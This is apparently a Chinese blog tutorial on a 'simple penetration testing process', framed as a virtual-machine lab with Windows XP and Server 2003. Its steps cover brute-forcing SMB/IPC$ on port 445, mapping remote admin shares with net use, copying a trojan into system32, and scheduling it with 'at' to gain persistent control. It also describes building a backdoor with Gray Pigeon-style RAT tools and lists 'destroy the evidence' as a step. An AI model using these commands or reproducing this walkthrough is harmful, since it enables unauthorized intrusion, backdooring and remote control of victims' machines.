目录:

  • 一:流程
  • 二:手工测试端口号
  • 三: ~~入侵~~(手动滑稽) 渗透步骤

一:流程

1 信息收集nslookup whois
2 扫描漏洞namp软件,扫描IP范围,端口scanport软件高级扫描:如IIS漏洞,扫描网站漏洞
3 漏洞利用
4 提权(shell环境、桌面环境、最高权限)
5 为所欲为。。。。。。。。
6 毁尸灭迹
7 留后门(植入木马)
8 渗透测试报告(风险等级,漏洞类型,安全加固方案等)

二:手工测试端口号

telnet IP 端口号net use f: \\10.1.1.2\share 密码 /user:用户名    把对方的共享文件夹映射为自己的f盘net use            查看有多少网络共享链接net use f: /delnet use * /delnet use f: \\10.1.1.2\c$ 密码 /user:用户名net use \\10.1.1.2\ipc$ 密码 /user:用户名       创建一个空链接,可以访问所有内容1:scanport扫描445端口2:445漏洞利用之一IPC$:进行暴力破解:用到工具NTscan3:net use \\10.1.1.2\ipc$ 密码 /user:用户名4:制作木马 ,利用灰鸽子软件5:植入木马(留后门)copy d:\heihei.exe \\10.1.1.1\C$\windows\system326:设置计划任务,自动执行木马:net time \\10.1.1.2at \\10.1.1.2 11:11 "c:\windows\system32\heihei.exe"7:等待肉鸡上线

三: 入侵(手动滑稽) 渗透步骤

虚拟机快照还原至初始状态
准备好xp和win2003,连接至同一网络,分别配置IP10.1.1.2/24,10.1.1.1/24
准备好软件


打开scanport软件扫描窗口

发现,局域网内有一台电脑开放了445端口号,它的IP地址是10.1.1.1

以记事本形式打开密码字典和账号字典,因为是做实验,所以加入一个正确的密码,放在其中

开始爆破

这时候我们就知道了,对方的账号administrator和密码123.com

现在就可以查看对方电脑的盘符文件了,比如查看C盘

再比如:我要控制对方关机


接下来运行刚才的关机脚本
如果直接这么做的话,那就是坑自己了,好像是运行\10.1.1.1\c$里面的脚本。实际上是在本机上运行

方法一:
可以telnet连接,前提是对方开启了23端口号


开启23之后,输入刚才爆破的账号密码,




方法二:
那对方没有开启23端口号呢,用到另外一条命令

at \\ip 时间 "运行程序的路径",注意这个路径不用c$,而是c:



接下来是留后门,植入木马,方便下次进入,打开软件“鸽子牧民战天”



这就是刚才生成的木马,我把保存路径修改成e盘根目录


接下来把xp本机生成的木马放到


三分钟之后,查看是否成功

渗透成功

若是渗透不成功,有可能是如下图的安装路径有问题,可以用默认的或者再换个路径试试

009 简单的渗透测试流程相关推荐

  1. 第18节 渗透测试流程和简单案例

    渗透测试流程和简单案例 1渗透测试概述 2渗透测试大致流程 3简单实验 3.1扫描 3.2利用共享服务端口445漏洞之IPC$ 3.3修改用户名增加暴力破解难度的方式 3.4暴力破解密码 3.5漏洞利 ...

  2. 查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试

    在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...

  3. 【CyberSecurityLearning 51】渗透测试方法论+渗透测试流程

    目录 渗透测试方法论 渗透测试(penetration testing,pentest) 渗透测试种类 * 黑盒测试 * 白盒测试 * 脆弱性评估与渗透测试 安全测试方法论 * 开放式web 应用程序 ...

  4. 渗透测试流程(单台服务器)

    渗透测试流程(单台服务器) 转载于:https://www.cnblogs.com/sky--/p/5781432.html

  5. 渗透测试入门17之一次完整的渗透测试流程

    一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现 ...

  6. 渗透测试流程信息收集

    渗透测试是一种评估方法,一种通过模拟黑客的攻击方式,来评估网站安全的方法 渗透测试流程分为7个阶段 信息收集 漏洞扫描 漏洞利用 内网转发 内网渗透 痕迹清除 编写报告 但在这7个阶段之前还有一个前提 ...

  7. 渗透测试八个步骤【渗透测试流程】

    渗透测试遵循软件测试的基本流程,但由于其测试过程与目标的特殊性,在具体实现步骤上渗透测试与常见软件测试并不相同.渗透测试流程主要包括8个步骤,如下图所示: 下面结合上图介绍每一个步骤所要完成的任务. ...

  8. 渗透测试流程(基础理论)

    当时考nisp二级时所学的理论,记录下来复习使用. 渗透测试流程 1.专用术语介绍 ​ 1.脚本(asp.php.jsp) ​ 2.html (css.js.html) ​ 3.HTTP协议 ​ 4. ...

  9. 通用渗透测试框架、简化渗透测试流程

    文章目录 通用渗透测试框架 简化的渗透测试流程 黑客攻击的一般过程 通用渗透测试框架 从技术管理的角度来看,遵循正规的测试框架对安全测试极为重要.通用渗透测试框架涵盖了典型的审计测试工作和渗透测试工作 ...

最新文章

  1. codeforce708C:树形dp+二次扫描
  2. Vivado如何计算关键路径的建立时间裕量?(理论分析篇)
  3. StoryBoard学习(5):使用segue页面间传递数据
  4. 理解Java的NIO
  5. 面向对象的多态性(3)
  6. 给IDEA给类和方法添加注解
  7. win7 第一次装 mysql-5.7-winx64 系列,不知道root 密码,该如何处理?
  8. async / await对异步的处理
  9. discuz设置用户每天回帖数_discuz回贴通知插件实现-显示用户状态设置
  10. String引起的OutOfMemory异常 + 如何计算C#对象所占内存的大小
  11. python gui控件案例_python基础教程python GUI库图形界面开发之PyQt5布局控件QHBoxLayout详细使用方法与实例...
  12. python条形码,Python中的远距离条形码
  13. 如何输入多组字符串c语言,求教大侠:如何输入一组字符串
  14. 外文论文_屏幕外文本用于复制和粘贴
  15. Mybaits入门搭建工程(selectOne,selectList,selectMap的用法)
  16. 震惊,java8 Nashorn和laytpl居然能擦出这样火花!
  17. 数据挖掘里的开源问题(PAKDD 2009 WORKSHOP CALL FOR PAPER)
  18. 磁盘管理之 raid 文件系统 分区
  19. 上海七宝惊现海宝美眉
  20. Maven项目在new module后,pom文件显示为Ignored pom.xml

热门文章

  1. rasp 系统_OpenRASP管理后台安装记录
  2. ASUS Z-170A 主板锁定 CPU 频率
  3. iPad 使用感想 - 初体验
  4. SpringBoot/Spring AOP默认动态代理方式
  5. PHP zend解密工具 PHP Zend-guard-decode
  6. webservice开发调用
  7. unity 中打印照片的四种方法
  8. Python中ctypes的使用整理
  9. extend()方法
  10. JAVA伏魔_伏魔三国志2-转轮圣王篇